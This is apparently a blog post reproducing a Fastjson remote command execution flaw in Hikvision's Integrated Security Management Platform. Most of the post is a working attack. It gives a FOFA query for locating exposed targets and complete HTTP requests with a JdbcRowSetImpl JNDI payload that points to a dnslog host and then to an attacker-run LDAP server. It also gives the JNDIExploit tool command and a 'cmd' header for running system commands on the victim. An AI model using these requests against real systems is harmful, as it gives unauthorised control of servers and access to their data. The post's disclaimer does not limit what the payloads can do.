[Vulnerability Reappearance] Hikvision Integrated Security Management Platform Fastjson Remote Command Execution Vulnerability Reappears


foreword

​Hikvision’s comprehensive security management platform has a Fastjson remote command execution vulnerability. Attackers can construct malicious Payloads to execute and obtain server system permissions and sensitive data information.


statement

This article is only used for vulnerability reproduction and technical research. Do not use the attack methods involved in the article for unauthorized penetration attacks. Any consequences caused have nothing to do with this article and the author, remember! ! !

1. Brief Introduction of Hikvision Integrated Security Management Platform

The comprehensive security management platform is designed based on the concept of "unified software technology architecture" and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, configuration, management and scheduling.

2. Vulnerability description

Hikvision’s comprehensive security management platform has a Fastjson remote command execution vulnerability, which can execute system commands and obtain system permissions and sensitive data information of the target server.


Three, the impact version

unknown

4. Vulnerability recurrence

FOFA: app=“HIKVISION-Comprehensive Security Management Platform”
insert image description here
vulnerability data package is as follows:

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

First of all, test whether the dnslog can be echoed when ldap is executed. If the request can be received, there is a high probability that there is a command execution vulnerability.
insert image description here
After confirming that dnslog can receive the request, it can be further exploited. Use the JNDIExploit-1.3-SNAPSHOT.jar tool to execute the following command

Tool download address: go to download

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSip

insert image description here
Then add fields to the header of Burp’s request packet. cmd: whoamiHere cmd can execute system commands. In the payload below, change ldap to your VPSip/Basic/TomcatEcho, as follows:

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

Burp puts the package and executes
insert image description here
the command execution successfully! ! !

5. Repair plan

At present, the manufacturer provides repair patches, please go to the official website to download the corresponding version patches.

Guess you like

Origin blog.csdn.net/weixin_46944519/article/details/130420770